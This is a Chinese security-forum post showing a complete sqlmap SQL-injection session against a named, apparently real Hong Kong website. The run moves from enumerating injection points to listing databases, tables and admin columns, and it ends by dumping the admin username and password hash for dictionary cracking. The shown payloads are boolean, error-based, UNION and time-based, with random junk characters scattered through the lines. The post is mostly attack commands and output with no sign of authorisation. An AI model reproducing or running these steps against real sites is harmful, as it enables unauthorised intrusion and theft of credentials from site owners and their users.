找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2931|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; _  j4 y' c* j. `6 \& ]ms "Mysql" --current-user       /*  注解:获取当前用户名称6 m7 s- g. i7 p1 g
    sqlmap/0.9 - automatic SQL injection and database takeover tool
& R* p* F1 d( B    http://sqlmap.sourceforge.net
  • starting at: 16:53:549 `- `5 ]' \! ^+ C% Z6 d2 g2 n: C, b
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    1 N- {8 Q( H& S/ l  ^" a5 h" p session file
    5 ^$ z8 ]. v* ]* g# F( t[16:53:54] [INFO] resuming injection data from session file5 j# w9 |' H9 Q5 l) w# A$ k  x
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    3 q8 R5 }; E: r8 [[16:53:54] [INFO] testing connection to the target url
    9 R& y4 o0 I9 c. k( @! [sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    , ^- C/ A0 X! I% B2 y+ S/ qsts:
    : m6 ?( ^, ~% y" n---
    * Y; `# a; |* H' H, ?1 g6 xPlace: GET
    " `! N- A8 ]; U" E% C) j* [Parameter: id
    0 K2 [: d. Y6 e) B    Type: boolean-based blind
    / L6 B2 [3 W4 c8 ]$ i* ?9 H+ A    Title: AND boolean-based blind - WHERE or HAVING clause, V2 `/ s4 }+ @; c4 L
        Payload: id=276 AND 799=7993 C8 g. U; J/ @, j5 J8 k! e, |& j
        Type: error-based
    5 C7 p& l" A! K2 L4 K% a; e    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    8 ?0 r; X& X. I0 j2 i    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& q8 ]' {8 O6 U; N! X" G* v8 b+ B
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58' V, H& m. C4 c, u6 u  h
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 F9 w: {" C" I2 T* s7 U    Type: UNION query
    : A6 H( p, y9 t5 V    Title: MySQL UNION query (NULL) - 1 to 10 columns# A) `. D& s4 s- g
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR" a! Z7 a5 T. y
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),. s+ @- N# Z+ w2 k, t7 e$ m/ r7 P
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ; D! z+ p& R: [5 ]    Type: AND/OR time-based blind
    9 J% g$ T4 ?+ }; G    Title: MySQL > 5.0.11 AND time-based blind; }, ?6 B' E+ S- I( y- l3 L& P! M
        Payload: id=276 AND SLEEP(5)/ i/ f# p- N# r) T; e" D3 C" t
    ---
    ) Z7 q* q3 w+ G3 i+ k- ?7 r' O[16:53:55] [INFO] the back-end DBMS is MySQL+ H: O6 }* ~# R9 L0 j
    web server operating system: Windows
    7 ?6 W/ u/ x+ p; ~web application technology: Apache 2.2.11, PHP 5.3.0
    4 R2 _1 [+ Q% A% Q# Aback-end DBMS: MySQL 5.01 d2 ^: q$ [$ }) }& W( ?( x
    [16:53:55] [INFO] fetching current user+ d& D. q% r! b2 P8 X
    current user:    'root@localhost'   
    # [" f* o$ m  T1 r1 ]' a  C[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    / P, D: L; I8 o4 P+ ^6 G. ntput\www.wepost.com.hk'
  • shutting down at: 16:53:58' T: O! M3 g/ f

    8 l4 ~7 c: x7 x6 ]D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* `5 F) Q# Q5 ]- Y4 j5 ~/ \
    ms "Mysql" --current-db                  /*当前数据库
    5 _" p. q1 d; M& ~, b% d    sqlmap/0.9 - automatic SQL injection and database takeover tool9 @9 c6 f; f  r; {2 e6 m
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    4 Z/ w# w) V" ?4 d& b3 x" }[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    5 v9 C3 Z( X4 { session file
    5 [/ c0 p; q& }& [4 q1 z/ A$ ~[16:54:16] [INFO] resuming injection data from session file$ c! {0 f" J& h$ v
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ; i7 e. s" k4 y8 @1 L* q; v( G& Z( D! \: ~[16:54:16] [INFO] testing connection to the target url* t- S! K7 E" k! z- ]
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    2 d9 {) I8 x( Lsts:
    : c7 f5 `$ H" k& {) g8 ]% U+ n---( ^/ F% c, |+ O8 Y; |
    Place: GET
    4 i1 z( C; V/ K. Z, J5 vParameter: id
    ) p: [  g- ]( W$ U( u2 ~# h    Type: boolean-based blind
    8 h: Z5 P: v" H" y: N    Title: AND boolean-based blind - WHERE or HAVING clause
    ) y) a. w7 P% u4 q- ?4 J    Payload: id=276 AND 799=7997 k. E  R4 G1 Y$ O5 y- x
        Type: error-based$ W4 i' s+ g& d7 Y& D; Z9 n
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* g, ^5 h  l- l/ v# f
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    : ^9 r- q" l# o) g8 i120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    . I! w- p# ^7 a& V# X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 f8 Z" T  G4 A) W% h& L9 e    Type: UNION query5 v- C" m% Z; |  J
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    % j: n" J; d& m- E$ H9 Z    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; E/ V- {, ]1 [1 U9 f
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    * }1 K# j/ ?; T, I# U4 Q8 pCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: g7 D: q( Y' e/ s, x
        Type: AND/OR time-based blind0 T6 b. I: ?3 e6 P$ E; R
        Title: MySQL > 5.0.11 AND time-based blind
    3 B- Z$ e. E& T    Payload: id=276 AND SLEEP(5)" M- M; I7 h8 n4 H8 I
    ---+ A7 b, S% F) m9 J& _( C+ x$ O
    [16:54:17] [INFO] the back-end DBMS is MySQL; H; ~9 X+ D6 F  \) G
    web server operating system: Windows
    " L: {, f' i# O5 Y0 n* H, M; ?- rweb application technology: Apache 2.2.11, PHP 5.3.0
    % F# t, j% U% ^8 ]# Lback-end DBMS: MySQL 5.00 d9 I" K) F  P# B
    [16:54:17] [INFO] fetching current database
    ! M3 |  u. ?. d7 o7 Icurrent database:    'wepost'2 w3 W9 z; D2 S9 A2 b2 m
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    7 d4 _# Q" d7 F# i* Rtput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    3 J  c, k9 d% N) h) sD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    5 @+ K7 e& D4 \ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    5 h2 @6 s# |9 Y5 j    sqlmap/0.9 - automatic SQL injection and database takeover tool) n9 H( A2 ^5 E6 v- e" u
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    7 ]5 r5 q0 J- ~+ a+ e[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: ]1 _5 B# R, d, P
    session file) `9 I7 ]/ N" c( `+ ^+ M) _
    [16:55:25] [INFO] resuming injection data from session file
    0 Y' J, Z; K2 R[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    # j: g( a5 i: A2 o[16:55:25] [INFO] testing connection to the target url
    + ^% u$ [! T( `* p- ]" Psqlmap identified the following injection points with a total of 0 HTTP(s) reque
    , G% R+ r, F. u+ K- U5 W& J5 }sts:+ ~& t8 U0 S  ]7 ]! e2 W* ~
    ---: _' y' A! m. |2 D- \- [1 h
    Place: GET
    + O9 a2 F6 T4 U1 K2 [3 H$ F. @: aParameter: id
    , _3 r1 F! f# `0 m) b) `% Y    Type: boolean-based blind
    6 v+ y3 p7 d& t    Title: AND boolean-based blind - WHERE or HAVING clause5 Z8 s0 X3 Y/ E; \* B
        Payload: id=276 AND 799=799% T& }; o, e% i% Q0 ^/ r5 e/ \, a
        Type: error-based
    % b5 q5 P) W( f( ~! h    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ) T, d1 P( O+ l7 ^! {; ]    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,1 S( m# x0 p( |/ e9 c5 x
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ! w8 R; g' Q! G* a$ x2 S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" Q8 G# N/ w2 g# I2 V0 r
        Type: UNION query
    8 f: ~6 P2 q3 j+ t% T: y    Title: MySQL UNION query (NULL) - 1 to 10 columns
    + W% ~( p; R% `5 ~! j    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 s8 [) W4 f, S7 w0 L
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," S' b6 }5 F) W0 e+ j) m
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#! U9 \  X+ N; \- S, c$ v4 T2 o- \
        Type: AND/OR time-based blind9 i& k: Q9 ?6 A+ ?. |) e4 w" k
        Title: MySQL > 5.0.11 AND time-based blind+ Y; t$ G; G8 H; d: B1 _+ b3 t/ u
        Payload: id=276 AND SLEEP(5)& Q/ H* r) w3 b* q6 n
    ---
    8 u/ Z  ?; F+ V0 N2 W[16:55:26] [INFO] the back-end DBMS is MySQL9 h0 U+ P2 s; j2 O" i# `
    web server operating system: Windows; c3 D. a, n3 Q& h& }; H1 }
    web application technology: Apache 2.2.11, PHP 5.3.0( d. z4 h( Z' Z4 h3 j5 s% I
    back-end DBMS: MySQL 5.00 e- V7 f* R/ b
    [16:55:26] [INFO] fetching tables for database 'wepost'
    ( Y+ W0 ?) M3 _3 n" }# |0 e[16:55:27] [INFO] the SQL query used returns 6 entries, t: V: T6 x; N- g* l2 i
    Database: wepost
    - I2 d/ P) L7 c2 o7 r[6 tables]
    & F9 @7 v* k2 R/ r! H: D2 _- |# c+-------------+
    : q$ A( ]( a  t/ G. T( f2 B| admin       |
    / s' M; f( G0 [$ e| article     |
    + L$ m! l2 P8 Z4 J3 M. g| contributor |# P* P- l; V/ n/ d
    | idea        |
    ) {( X; j  F! b- L' @7 _| image       |) M) b6 B5 \/ G" F$ G4 O) W3 B
    | issue       |5 E4 ]. D$ ?6 Q1 T4 ^" `/ @0 g, v
    +-------------+# G6 H3 E# v1 C$ j8 I2 k& V7 j
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    - l( Q, z# s5 d2 s  `& d& Wtput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    $ m# ^, \$ c; a( q
    # v. w- @" Z1 N3 W0 U/ [1 K1 KD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 ~7 }; J) r& y. ]+ z
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    % y* `8 C& b0 E# ?  j0 W- ]4 r) J    sqlmap/0.9 - automatic SQL injection and database takeover tool/ h1 j1 Q8 j! x- `5 @! f% u+ R; R* u
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06% A% L  ]  B. B
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque! |3 }  |$ y, v* p2 I  m4 [
    sts:1 F) a7 l" J/ z- x* ^% {
    ---
    ; T2 C0 L, _, a5 k! Y( a2 RPlace: GET
    * m$ }# a* a+ {" tParameter: id
    . u+ ]  j, t) `, ~    Type: boolean-based blind/ C, r! [) d4 x
        Title: AND boolean-based blind - WHERE or HAVING clause
    ( X- ^- J* q4 n7 m0 F. ]    Payload: id=276 AND 799=799+ _/ Y2 }# s, n
        Type: error-based+ W1 m1 v+ L* |' X6 A
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause6 N+ L- \  i/ |6 N
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,+ {, G/ Y$ A- W) Y; {, Y* K
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    % J$ C% @( V! Z+ H),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)  V9 X3 G5 K9 [$ A5 p8 T: J2 I
        Type: UNION query8 ?/ M/ s2 x- Q3 h# K' b
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    6 ?8 z/ ]6 Y3 R; R2 H' x* D    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 B- [/ [* ?' H: ^& \! G  G
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),1 ?% t: M; K. i- p9 K6 {+ j
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" h1 i( _+ X! s: o! A
        Type: AND/OR time-based blind) M& b. t4 J: m3 J: a1 b9 c7 ~+ n! Y
        Title: MySQL > 5.0.11 AND time-based blind  e. ]/ n/ \$ ^& i. o1 Z9 Y
        Payload: id=276 AND SLEEP(5)
    " p2 V. u7 \* n# H3 n* N3 N9 K---  ]' g8 T+ \! H: U% D4 H# y7 M5 @
    web server operating system: Windows2 u0 v4 u6 @0 f& z" R; V) }9 b. o
    web application technology: Apache 2.2.11, PHP 5.3.0/ t/ T6 ]' T* H" `/ p- b" Z0 F
    back-end DBMS: MySQL 5.0
    ! Q0 @$ N. j6 h1 v% Z1 h[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se2 T  W# h+ s* k1 K4 r; z9 f) x6 U$ ^3 v
    ssion': wepost, wepost
    / u6 Y( f" b8 G9 d" Y4 s# SDatabase: wepost" N! N( Z/ ^% ]' Y" S" ^2 B
    Table: admin+ M$ n4 \3 R8 h
    [4 columns]+ ]( z+ M' j6 j6 r) C' t6 o9 L0 t
    +----------+-------------+1 i6 T& j+ Z0 C2 B0 {, r( f: c$ }. c  c' M
    | Column   | Type        |* s6 ]) k" e0 N
    +----------+-------------+
    " X( Q. _$ ~4 G| id       | int(11)     |
    8 |* n& @, n3 b| password | varchar(32) |
    1 u& r2 Z/ I, f" z! ]- n| type     | varchar(10) |0 H! {! N8 Y# o) |' Q0 U; |
    | userid   | varchar(20) |
    , b4 U# P* A5 p+----------+-------------+
    1 ^1 P9 l- W7 Q* M5 M) E! V
  • shutting down at: 16:56:19: N" q9 O& z. ~  J7 c
    , g& g7 j* ^- e- o3 o0 [
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 O  t8 C( l! _
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容+ D+ a3 G  ~( E/ R
        sqlmap/0.9 - automatic SQL injection and database takeover tool1 j2 `5 x4 c! F& s
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    ' M7 \! o: ~1 E: b$ I2 vsqlmap identified the following injection points with a total of 0 HTTP(s) reque- x! q8 _2 ~' r. z% O0 W
    sts:3 a# p" T# g' D5 f9 \) Q' D
    ---5 n: v4 l2 {2 i5 Z+ s: _
    Place: GET0 B( g  x& L& o0 ^
    Parameter: id5 w" g  U5 ~3 G  o5 ], _/ o
        Type: boolean-based blind
    9 r4 b/ l, B% Y6 O0 D! k* c. k/ y0 ?    Title: AND boolean-based blind - WHERE or HAVING clause
    & |7 W) N2 M9 s    Payload: id=276 AND 799=799
    ' t: x2 S+ c, N; D    Type: error-based
    2 i) L. B% b( o5 `1 H- R    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause* ?6 Y1 b, j0 _
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,$ v0 J" d+ S) P7 r* U8 _
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    3 g- O& g& K- X1 i4 x% C2 h2 z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    ! N5 H  O6 r" g; A7 N. [6 f    Type: UNION query
    ; n& N# h- A3 G, D" a    Title: MySQL UNION query (NULL) - 1 to 10 columns
    3 r/ Z& [  U8 ?% z$ X' C    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; W( b: j3 Z9 ~* u(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    2 B( e( ]0 a; ECHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    / B3 }$ d/ J( C1 |- c    Type: AND/OR time-based blind
    " @: C* @# ^0 B3 P3 i    Title: MySQL > 5.0.11 AND time-based blind
    ) {2 W- Y8 e2 m, e, u6 c5 J    Payload: id=276 AND SLEEP(5)5 F/ e! ]9 |. H3 p5 T
    ---8 J. \* O9 Q7 L6 {" g
    web server operating system: Windows1 e! b1 k8 M7 E! x. }
    web application technology: Apache 2.2.11, PHP 5.3.0
    2 F* s/ S4 N5 E* {( P! Kback-end DBMS: MySQL 5.0, R' E/ D& v. k! K
    recognized possible password hash values. do you want to use dictionary attack o" I  m. \# G# w" R+ l+ s
    n retrieved table items? [Y/n/q] y
    5 i' c% ^. N3 C* y# `3 h3 [* Dwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    : K& [8 A% D. `- C7 x" p2 |6 L2 _do you want to use common password suffixes? (slow!) [y/N] y+ d, e) O: D* j- q
    Database: wepost
    + C3 E& _( U/ d8 f" ITable: admin
    - ^& ]7 k" Z+ X4 M; U[1 entry]
    , n: X7 J+ n' t. H- `2 ^+----------------------------------+------------+8 u5 l6 d% I$ g, i& ~0 n# [
    | password                         | userid     |: j" O+ Q. A, r1 y% w% z! X8 c
    +----------------------------------+------------+
    6 N4 V0 L' e: R| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    1 A, \1 j) L# G+ Q4 x, S! `+----------------------------------+------------+1 a( i8 Y, P7 F  W4 I$ ?' J, B
  • shutting down at: 16:58:14) ]' z9 G! {* r5 S1 T  A

    2 t0 S( Z9 q+ m1 h1 w4 N8 ID:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表